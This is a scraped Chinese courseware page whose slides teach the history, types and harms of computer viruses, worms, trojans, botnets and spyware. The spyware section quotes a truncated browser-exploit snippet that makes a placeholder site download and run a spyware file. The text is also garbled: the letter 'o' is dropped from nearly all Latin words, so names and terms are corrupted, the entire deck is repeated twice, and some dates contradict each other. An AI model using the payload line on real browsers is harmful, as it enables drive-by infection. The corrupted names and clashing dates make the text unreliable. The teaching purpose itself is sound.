还剩52页未读,
继续阅读
小学信息技术冀教版四年级上册二 常用工具软件下载、安装和使用,计算机病毒第11课 计算机病毒与网络安全集体备课课件ppt
展开
这是一份小学信息技术冀教版四年级上册二 常用工具软件下载、安装和使用,计算机病毒第11课 计算机病毒与网络安全集体备课课件ppt,共60页。PPT课件主要包含了PowerOn,POSTTests,DOSLoaded,系统引导区,引导正常执行,引导系统,病毒体,程序头,病毒程序头等内容,欢迎下载使用。
计算机病毒的起源与发展计算机病毒的定义与特征 ★计算机病毒的分类计算机病毒的危害性计算机病毒分析 ★其他恶意程序
自第一个真正意义上的计算机病毒于1983年走出实验室以来,人们对它的认识经历了“不以为然→谈毒色变→口诛笔伐,人人喊打→理性对待,泰然处之”四个阶段 。
1977年:出现在科幻小说中1983年: Fred Chen:在计算机安全研讨会上发布1986年:巴基斯坦两兄弟为追踪非法拷贝其软件的人制造了“巴基斯坦”病毒,成了世界上公认的第一个传染PC兼容机的病毒,并且很快在全球流行。1987年10月:美国发现世界上第一例病毒(Brain)。1988年:小球病毒传入我国,在几个月之内迅速传染了20 多个省、市,成为我国第一个病毒案例。此后,如同打开的潘多拉的盒子,各种计算机病毒层出不穷!
计算机病毒的发展阶段—萌芽阶段
1 萌芽阶段 1986年到1989年:计算机病毒的萌芽时期病毒清除相对比较容易 特点:攻击目标单一主要采取截取系统中断向量的方式监控系统的运行状态,并在一定的触发条件下进行传播传染后特征明显不具自我保护措施
计算机病毒的发展阶段—综合发展阶段
2 综合发展阶段1989年到1992年:由简单到复杂,由原始走向成熟 特点:攻击目标趋于混合型采用更为隐蔽的方法驻留内存感染目标后没有明显的特征 开始采用自我保护措施开始出现变种
计算机病毒的发展阶段—成熟发展阶段
3 成熟发展阶段 1992到1995年:病毒开始具有多态性质。病毒每次传染目标时,嵌入宿主程序中的病毒程序大部分可变种,正由于这个特点,传统的特征码检测病毒法开始了新的探索研究 在这个阶段,病毒的发展主要集中在病毒技术的提高上,病毒开始向多维化方向发展,对反病毒厂商也提出了新的挑战
计算机病毒的发展阶段—网络病毒阶段
4 网络病毒阶段 1995年到2000年:随着网络的普及,大量的病毒开始利用网络传播,蠕虫开始大规模的传播。由于网络的便利和信息的共享,很快又出现了通过E-mail传播的病毒。由于宏病毒编写简单、破坏性强、清除复杂,加上微软未对WORD文档结构公开,给清除宏病毒带来了不便这一阶段的病毒,主要是利用网络来进行传播和破坏
计算机病毒的发展阶段—迅速壮大的阶段
5.迅速壮大的阶段2000年以后:成熟繁荣阶段,计算机病毒的更新和传播手段更加多样性,网络病毒的目的性也更强出现了木马,恶意软件等特定目的的恶意程序 特点:技术综合利用,病毒变种速度大大加快恶意软件和病毒程序直接把矛头对向了杀毒软件计算机病毒技术和反病毒技术的竞争进一步激化,反病毒技术也面临着新的洗牌
狭义定义计算机病毒是一种靠修改其它程序来插入或进行自身拷贝,从而感染其它程序的一种程序。 —— Fred Chen博士对计算机病毒的定义。广义定义能够引起计算机故障,破坏计算机数据,影响计算机系统的正常使用的程序代码。我国定义《中华人民共和国计算机信息系统安全保护条例》第二十八条:"计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。”
基本特征传染性自我复制,通过多种渠道传播潜伏性感染后不一定立刻发作依附于其他文件、程序、介质,不被发现可触发性触发条件:日期、时间、文件类型破坏性破坏数据的完整性和可用性破坏数据的保密性系统和资源的可用性非授权可执行性
其它特征寄生性寄生于其它文件、程序隐蔽性程序隐蔽、传染隐蔽;不易被发现针对性*针对特定的计算机、特定的操作系统多态性*每一次感染后改变形态,检测更困难持久性*难于清除
按宿主分类按危害分类按传播媒介分类按攻击平台分类
按宿主分类1)引导型病毒主引导区操作系统引导区2)文件型病毒操作系统应用程序宏病毒3)复合型病毒复合型病毒具有引导区型病毒和文件型病毒两者的特征
按危害分类良性病毒如:小球病毒恶性病毒如:CIH病毒
按传播媒介分类单机病毒DOS、Windws、Unix/Linux病毒等网络病毒通过网络或电子邮件传播
按攻击平台分类DOS病毒:MS-DOS及兼容操作系统上编写的病毒Windws病毒:Win32上编写的纯32位病毒程序MAC病毒Unix/Linux病毒
攻击系统数据区攻击部位包括硬盘主引导扇区、Bt扇区、FAT表、文件目录攻击文件删除、改名、替换内容、丢失簇和对文件加密等攻击内存内存是计算机的重要资源,也是病毒攻击的重要目标
干扰系统运行,使运行速度下降如不执行命令、打不开文件干扰内部命令的执行、扰乱串并接口、虚假报警、强制游戏内部栈溢出、重启动、死机病毒激活时,系统时间延迟程序启动,在时钟中纳入循环计数,迫使计算机空转,运行速度明显下降干扰键盘、喇叭或屏幕,适用户无法正常操作响铃、封锁键盘、换字、抹掉缓存区字符、输入紊乱等。许多病毒运行时,会使计算机的喇叭发出响声病毒扰乱显示的方式很多,如字符跌落、倒置、显示前一屏、打开对话框、光标下跌、滚屏、抖动、乱写等
攻击CMOS,破坏系统硬件有的病毒激活时,能够对CMOS进行写入动作,破坏CMOS中的数据。例如CIH病毒破坏计算机硬件,乱写某些主板BIOS芯片,损坏硬盘干扰打印机如假报警、间断性打印或更换字符干扰网络正常运行网络病毒破坏网络系统,非法使用网络资源,破坏电子邮件,发送垃圾信息,占用网络带宽、阻塞网络、造成拒绝服务等
计算机病毒的起源与发展计算机病毒的定义和特征 ★计算机病毒的分类计算机病毒的危害性计算机病毒分析 ★其他恶意程序
计算机病毒的结构及工作机理引导型病毒分析文件型病毒分析宏病毒分析蠕虫病毒分析特洛伊木马分析
①计算机病毒的结构及工作机理
引导过程也就是病毒的初始化部分,它随着宿主程序的执行而进入内存,为传染部分做准备传染过程作用是将病毒代码复制到目标上去。一般病毒在对目标进行传染前,要首先判断传染条件是否满足,判断病毒是否已经感染过该目标等,如CIH病毒只针对Windws 95/98操作系统表现过程是病毒间差异最大的部分,前两部分是为这部分服务的。它破坏被传染系统或者在被传染系统的设备上表现出特定的现象。大部分病毒都是在一定条件下才会触发其表现部分的
引导型病毒传染机理利用系统启动的缺陷传染目标硬盘的主引导区和引导区软盘的引导区传染途径通过软盘启动计算机防治办法从C盘启动打开主板的方病毒功能典型病毒小球病毒、大麻病毒、火炬病毒、Anti-CMOS病毒
引导型病毒引导扇区是大部分系统启动或引导指令所保存的地方,而且对所有的磁盘来讲,不管是否可以引导,都有一个引导扇区。感染的主要方式就是发生在计算机通过已被感染的引导盘(常见的如一个软盘)引导时发生的。
引导型病毒——主引导记录(MBR)
引导型病毒——系统引导过程
CPU & ROM BIOS Initializes
Lk fr bt device
MBR btPartitin Table Lad
DOS Bt Sectr Runs
引导型病毒——感染与执行过程
文件型病毒传染机理:利用系统加载执行文件的缺陷传染目标:各种能够获得系统控制权执行的文件传染途径:各种存储介质、网络、电子邮件防治办法使用具有实时监控功能的杀毒软件不要轻易打开邮件附件典型病毒1575病毒、CIH病毒
文件型病毒文件型病毒与引导扇区病毒区别是:它攻击磁盘上的文件
文件型病毒——传染机理
宏病毒定义:宏病毒是指利用软件所支持的宏命令或语言书写的一段寄生在支持宏的文档上的,具有复制、传染能力的宏代码跨平台式计算机病毒:可以在Windws 9X、Windws NT、OS/2和Unix、Mac等操作系统上执行病毒行为影响系统的性能以及对文档的各种操作,如打开、存储、关闭或清除等宏病毒对病毒而言是一次革命。现在通过E-mail、3W的互联能力及宏语言的进一步强化,极大地增强了它的传播能力
宏病毒传染机理:利用处理的文件可以内嵌宏的功能传染目标:dc、dt、xls、ppt、mdb等文件(Win)传染途径:各种存储介质、网络、电子邮件防治办法使用具有实时监控功能的杀毒软件打开系统提供的宏保护功能典型病毒“七月杀手”病毒、“美丽莎”病毒
蠕虫病毒一个独立的计算机程序,不需要宿主自我复制,自主传播(Mbile)占用系统或网络资源、破坏其他程序不伪装成其他程序,靠自主传播利用系统漏洞;利用电子邮件(无需用户参与)
蠕虫病毒传染机理:利用系统或服务的漏洞传染目标:操作系统或应用服务传染途径:网络、电子邮件防治办法使用具有实时监控功能的杀毒软件不要轻易打开邮件附件打最新补丁,更新系统典型病毒RedCde,尼姆达、冲击波等
实例:莫尔斯蠕虫事件发生于1988年,当时导致大约3000台机器瘫痪主要的攻击方法Rsh,rexec:用户的缺省认证Sendmail 的debug模式Fingerd的缓冲区溢出口令猜测
实例——RedCde 是一种结合了病毒、木马、DDOS机制的蠕虫2001年7月中旬,在美国等地大规模蔓延;2001年8月初,出现变种cdered II,针对中文版windws系统,国内大规模蔓延特点:通过80端口传播只存在于网络服务器的内存,不通过文件载体利用IIS缓冲区溢出漏洞(2001年6月18日发布)
实例——RedCde I主要影响Windws NT系统和Windws 2000主要影响国外网络据CERT统计,感染超过25万台主要行为利用IIS 的Index服务的缓冲区溢出缺陷进入系统检查c:\ntwrm文件是否存在以判断是否感染中文保护(是中文windws就不修改主页)攻击白宫!
特洛伊木马程序名字来源:古希腊故事通过伪装成其他程序、有意隐藏自己恶意行为的程序,通常留下一个远程控制的后门没有自我复制的功能非自主传播用户主动发送给其他人放到网站上由用户下载
特洛伊木马程序传播途径通过网络下载、电子邮件防治办法使用具有实时监控功能的杀毒软件不要轻易打开邮件附件不要轻易运行来路不明的文件典型例子BO、BO2k、Subseven、冰河、广外女生等
病毒、蠕虫与木马的比较
后门(Backdr)一种能让黑客未经授权进入和使用本系统的恶意程序僵尸(Bt)一种集后门与蠕虫一体的恶意程序. 通常使用IRC (Internet Relay Chat) 接受和执行黑客命令广告软件/间谍软件
具有反侦测能力隐藏文件, 进程, 网络端口和连接, 系统设置, 系统服务可以在恶意程序之中, 例如 Berbew;也有独立软件, 例如 Hackder Defender为控制者提供远程操作能力
僵尸生态系统僵尸僵尸网管理通道看守者从 MyDm.A开始进入鼎盛期打开后门 TCP prt 3127 - 3198下载和执行程序利用被感染的计算机散发电子邮件数以百万计的感染计算机被出卖给了垃圾邮件的制造者
②僵尸——僵尸网发展趋势
1)源代码可在网上免费下载2)管理方式的变化:过去: 集中管理一个 IRC 服务器管理所有僵尸关闭服务器就破坏了僵尸网现在: 提升注册多个IRC 服务器通讯加密 (AES-128 或更强)今后: 分布式 (P2P)管理对照分析: Napster: 集中管理, 容易被关闭eDnkey: 分布式管理, 不容易被关闭
③广告软件/间谍软件
广告软件弹出窗口及横幅形式向用户提供广告服务通常经过用户授权间谍软件未经授权收集用户信息未经授权上传用户信息未经授权改变系统外表及行为
③广告软件/间谍软件——传播方式
社会工程(欺骗)方法 非软件或硬件漏洞电子邮件:附属可执行文件电子邮件:隐蔽真实联接弹出窗口伪装网站附属于其它免费或商业软件利用浏览器瑕疵自动下载及安装
手段一: 虚假安全警告
手段二: “取消”实际为“是”
手段四: 附加安装软件
手段五:利用浏览器缺陷
一些浏览器缺陷可被利用绕过安全检测和用户提示,直接启动恶意程序例如,利用MS03-014缺陷自动下载及运行文件{u='httpwww.nt-real-site.cm/SpywareFile.chm';dcument.write('
间谍程序Spyware
病 毒Viruses
后门程序BACKDOORS
蠕 虫 WORMSE-mailNetwrkIRC
恶意程序Malware
“All Wrms are Viruses” but “Nt all Viruses are Wrms”
计算机病毒的起源与发展计算机病毒的定义与特征 ★计算机病毒的分类计算机病毒的危害性计算机病毒分析 ★其他恶意程序
自第一个真正意义上的计算机病毒于1983年走出实验室以来,人们对它的认识经历了“不以为然→谈毒色变→口诛笔伐,人人喊打→理性对待,泰然处之”四个阶段 。
1977年:出现在科幻小说中1983年: Fred Chen:在计算机安全研讨会上发布1986年:巴基斯坦两兄弟为追踪非法拷贝其软件的人制造了“巴基斯坦”病毒,成了世界上公认的第一个传染PC兼容机的病毒,并且很快在全球流行。1987年10月:美国发现世界上第一例病毒(Brain)。1988年:小球病毒传入我国,在几个月之内迅速传染了20 多个省、市,成为我国第一个病毒案例。此后,如同打开的潘多拉的盒子,各种计算机病毒层出不穷!
计算机病毒的发展阶段—萌芽阶段
1 萌芽阶段 1986年到1989年:计算机病毒的萌芽时期病毒清除相对比较容易 特点:攻击目标单一主要采取截取系统中断向量的方式监控系统的运行状态,并在一定的触发条件下进行传播传染后特征明显不具自我保护措施
计算机病毒的发展阶段—综合发展阶段
2 综合发展阶段1989年到1992年:由简单到复杂,由原始走向成熟 特点:攻击目标趋于混合型采用更为隐蔽的方法驻留内存感染目标后没有明显的特征 开始采用自我保护措施开始出现变种
计算机病毒的发展阶段—成熟发展阶段
3 成熟发展阶段 1992到1995年:病毒开始具有多态性质。病毒每次传染目标时,嵌入宿主程序中的病毒程序大部分可变种,正由于这个特点,传统的特征码检测病毒法开始了新的探索研究 在这个阶段,病毒的发展主要集中在病毒技术的提高上,病毒开始向多维化方向发展,对反病毒厂商也提出了新的挑战
计算机病毒的发展阶段—网络病毒阶段
4 网络病毒阶段 1995年到2000年:随着网络的普及,大量的病毒开始利用网络传播,蠕虫开始大规模的传播。由于网络的便利和信息的共享,很快又出现了通过E-mail传播的病毒。由于宏病毒编写简单、破坏性强、清除复杂,加上微软未对WORD文档结构公开,给清除宏病毒带来了不便这一阶段的病毒,主要是利用网络来进行传播和破坏
计算机病毒的发展阶段—迅速壮大的阶段
5.迅速壮大的阶段2000年以后:成熟繁荣阶段,计算机病毒的更新和传播手段更加多样性,网络病毒的目的性也更强出现了木马,恶意软件等特定目的的恶意程序 特点:技术综合利用,病毒变种速度大大加快恶意软件和病毒程序直接把矛头对向了杀毒软件计算机病毒技术和反病毒技术的竞争进一步激化,反病毒技术也面临着新的洗牌
狭义定义计算机病毒是一种靠修改其它程序来插入或进行自身拷贝,从而感染其它程序的一种程序。 —— Fred Chen博士对计算机病毒的定义。广义定义能够引起计算机故障,破坏计算机数据,影响计算机系统的正常使用的程序代码。我国定义《中华人民共和国计算机信息系统安全保护条例》第二十八条:"计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。”
基本特征传染性自我复制,通过多种渠道传播潜伏性感染后不一定立刻发作依附于其他文件、程序、介质,不被发现可触发性触发条件:日期、时间、文件类型破坏性破坏数据的完整性和可用性破坏数据的保密性系统和资源的可用性非授权可执行性
其它特征寄生性寄生于其它文件、程序隐蔽性程序隐蔽、传染隐蔽;不易被发现针对性*针对特定的计算机、特定的操作系统多态性*每一次感染后改变形态,检测更困难持久性*难于清除
按宿主分类按危害分类按传播媒介分类按攻击平台分类
按宿主分类1)引导型病毒主引导区操作系统引导区2)文件型病毒操作系统应用程序宏病毒3)复合型病毒复合型病毒具有引导区型病毒和文件型病毒两者的特征
按危害分类良性病毒如:小球病毒恶性病毒如:CIH病毒
按传播媒介分类单机病毒DOS、Windws、Unix/Linux病毒等网络病毒通过网络或电子邮件传播
按攻击平台分类DOS病毒:MS-DOS及兼容操作系统上编写的病毒Windws病毒:Win32上编写的纯32位病毒程序MAC病毒Unix/Linux病毒
攻击系统数据区攻击部位包括硬盘主引导扇区、Bt扇区、FAT表、文件目录攻击文件删除、改名、替换内容、丢失簇和对文件加密等攻击内存内存是计算机的重要资源,也是病毒攻击的重要目标
干扰系统运行,使运行速度下降如不执行命令、打不开文件干扰内部命令的执行、扰乱串并接口、虚假报警、强制游戏内部栈溢出、重启动、死机病毒激活时,系统时间延迟程序启动,在时钟中纳入循环计数,迫使计算机空转,运行速度明显下降干扰键盘、喇叭或屏幕,适用户无法正常操作响铃、封锁键盘、换字、抹掉缓存区字符、输入紊乱等。许多病毒运行时,会使计算机的喇叭发出响声病毒扰乱显示的方式很多,如字符跌落、倒置、显示前一屏、打开对话框、光标下跌、滚屏、抖动、乱写等
攻击CMOS,破坏系统硬件有的病毒激活时,能够对CMOS进行写入动作,破坏CMOS中的数据。例如CIH病毒破坏计算机硬件,乱写某些主板BIOS芯片,损坏硬盘干扰打印机如假报警、间断性打印或更换字符干扰网络正常运行网络病毒破坏网络系统,非法使用网络资源,破坏电子邮件,发送垃圾信息,占用网络带宽、阻塞网络、造成拒绝服务等
计算机病毒的起源与发展计算机病毒的定义和特征 ★计算机病毒的分类计算机病毒的危害性计算机病毒分析 ★其他恶意程序
计算机病毒的结构及工作机理引导型病毒分析文件型病毒分析宏病毒分析蠕虫病毒分析特洛伊木马分析
①计算机病毒的结构及工作机理
引导过程也就是病毒的初始化部分,它随着宿主程序的执行而进入内存,为传染部分做准备传染过程作用是将病毒代码复制到目标上去。一般病毒在对目标进行传染前,要首先判断传染条件是否满足,判断病毒是否已经感染过该目标等,如CIH病毒只针对Windws 95/98操作系统表现过程是病毒间差异最大的部分,前两部分是为这部分服务的。它破坏被传染系统或者在被传染系统的设备上表现出特定的现象。大部分病毒都是在一定条件下才会触发其表现部分的
引导型病毒传染机理利用系统启动的缺陷传染目标硬盘的主引导区和引导区软盘的引导区传染途径通过软盘启动计算机防治办法从C盘启动打开主板的方病毒功能典型病毒小球病毒、大麻病毒、火炬病毒、Anti-CMOS病毒
引导型病毒引导扇区是大部分系统启动或引导指令所保存的地方,而且对所有的磁盘来讲,不管是否可以引导,都有一个引导扇区。感染的主要方式就是发生在计算机通过已被感染的引导盘(常见的如一个软盘)引导时发生的。
引导型病毒——主引导记录(MBR)
引导型病毒——系统引导过程
CPU & ROM BIOS Initializes
Lk fr bt device
MBR btPartitin Table Lad
DOS Bt Sectr Runs
引导型病毒——感染与执行过程
文件型病毒传染机理:利用系统加载执行文件的缺陷传染目标:各种能够获得系统控制权执行的文件传染途径:各种存储介质、网络、电子邮件防治办法使用具有实时监控功能的杀毒软件不要轻易打开邮件附件典型病毒1575病毒、CIH病毒
文件型病毒文件型病毒与引导扇区病毒区别是:它攻击磁盘上的文件
文件型病毒——传染机理
宏病毒定义:宏病毒是指利用软件所支持的宏命令或语言书写的一段寄生在支持宏的文档上的,具有复制、传染能力的宏代码跨平台式计算机病毒:可以在Windws 9X、Windws NT、OS/2和Unix、Mac等操作系统上执行病毒行为影响系统的性能以及对文档的各种操作,如打开、存储、关闭或清除等宏病毒对病毒而言是一次革命。现在通过E-mail、3W的互联能力及宏语言的进一步强化,极大地增强了它的传播能力
宏病毒传染机理:利用处理的文件可以内嵌宏的功能传染目标:dc、dt、xls、ppt、mdb等文件(Win)传染途径:各种存储介质、网络、电子邮件防治办法使用具有实时监控功能的杀毒软件打开系统提供的宏保护功能典型病毒“七月杀手”病毒、“美丽莎”病毒
蠕虫病毒一个独立的计算机程序,不需要宿主自我复制,自主传播(Mbile)占用系统或网络资源、破坏其他程序不伪装成其他程序,靠自主传播利用系统漏洞;利用电子邮件(无需用户参与)
蠕虫病毒传染机理:利用系统或服务的漏洞传染目标:操作系统或应用服务传染途径:网络、电子邮件防治办法使用具有实时监控功能的杀毒软件不要轻易打开邮件附件打最新补丁,更新系统典型病毒RedCde,尼姆达、冲击波等
实例:莫尔斯蠕虫事件发生于1988年,当时导致大约3000台机器瘫痪主要的攻击方法Rsh,rexec:用户的缺省认证Sendmail 的debug模式Fingerd的缓冲区溢出口令猜测
实例——RedCde 是一种结合了病毒、木马、DDOS机制的蠕虫2001年7月中旬,在美国等地大规模蔓延;2001年8月初,出现变种cdered II,针对中文版windws系统,国内大规模蔓延特点:通过80端口传播只存在于网络服务器的内存,不通过文件载体利用IIS缓冲区溢出漏洞(2001年6月18日发布)
实例——RedCde I主要影响Windws NT系统和Windws 2000主要影响国外网络据CERT统计,感染超过25万台主要行为利用IIS 的Index服务的缓冲区溢出缺陷进入系统检查c:\ntwrm文件是否存在以判断是否感染中文保护(是中文windws就不修改主页)攻击白宫!
特洛伊木马程序名字来源:古希腊故事通过伪装成其他程序、有意隐藏自己恶意行为的程序,通常留下一个远程控制的后门没有自我复制的功能非自主传播用户主动发送给其他人放到网站上由用户下载
特洛伊木马程序传播途径通过网络下载、电子邮件防治办法使用具有实时监控功能的杀毒软件不要轻易打开邮件附件不要轻易运行来路不明的文件典型例子BO、BO2k、Subseven、冰河、广外女生等
病毒、蠕虫与木马的比较
后门(Backdr)一种能让黑客未经授权进入和使用本系统的恶意程序僵尸(Bt)一种集后门与蠕虫一体的恶意程序. 通常使用IRC (Internet Relay Chat) 接受和执行黑客命令广告软件/间谍软件
具有反侦测能力隐藏文件, 进程, 网络端口和连接, 系统设置, 系统服务可以在恶意程序之中, 例如 Berbew;也有独立软件, 例如 Hackder Defender为控制者提供远程操作能力
僵尸生态系统僵尸僵尸网管理通道看守者从 MyDm.A开始进入鼎盛期打开后门 TCP prt 3127 - 3198下载和执行程序利用被感染的计算机散发电子邮件数以百万计的感染计算机被出卖给了垃圾邮件的制造者
②僵尸——僵尸网发展趋势
1)源代码可在网上免费下载2)管理方式的变化:过去: 集中管理一个 IRC 服务器管理所有僵尸关闭服务器就破坏了僵尸网现在: 提升注册多个IRC 服务器通讯加密 (AES-128 或更强)今后: 分布式 (P2P)管理对照分析: Napster: 集中管理, 容易被关闭eDnkey: 分布式管理, 不容易被关闭
③广告软件/间谍软件
广告软件弹出窗口及横幅形式向用户提供广告服务通常经过用户授权间谍软件未经授权收集用户信息未经授权上传用户信息未经授权改变系统外表及行为
③广告软件/间谍软件——传播方式
社会工程(欺骗)方法 非软件或硬件漏洞电子邮件:附属可执行文件电子邮件:隐蔽真实联接弹出窗口伪装网站附属于其它免费或商业软件利用浏览器瑕疵自动下载及安装
手段一: 虚假安全警告
手段二: “取消”实际为“是”
手段四: 附加安装软件
手段五:利用浏览器缺陷
一些浏览器缺陷可被利用绕过安全检测和用户提示,直接启动恶意程序例如,利用MS03-014缺陷自动下载及运行文件{u='httpwww.nt-real-site.cm/SpywareFile.chm';dcument.write('
间谍程序Spyware
病 毒Viruses
后门程序BACKDOORS
蠕 虫 WORMSE-mailNetwrkIRC
恶意程序Malware
“All Wrms are Viruses” but “Nt all Viruses are Wrms”
相关课件
2020-2021学年第6课 防范网络陷阱与计算机病毒教学演示ppt课件: 这是一份2020-2021学年第6课 防范网络陷阱与计算机病毒教学演示ppt课件,共15页。
信息技术四年级上册第6课 防范网络陷阱与计算机病毒课堂教学课件ppt: 这是一份信息技术四年级上册第6课 防范网络陷阱与计算机病毒课堂教学课件ppt,共14页。PPT课件主要包含了防范网络陷阱,计算机病毒,内容提要,中奖诈骗,购物骗局,QQ陷阱,微信诈骗,表6-1,防骗小妙招等内容,欢迎下载使用。
小学信息技术第11课 计算机病毒与网络安全说课课件ppt: 这是一份小学信息技术第11课 计算机病毒与网络安全说课课件ppt,共12页。PPT课件主要包含了罪魁祸首,计算机病毒等内容,欢迎下载使用。
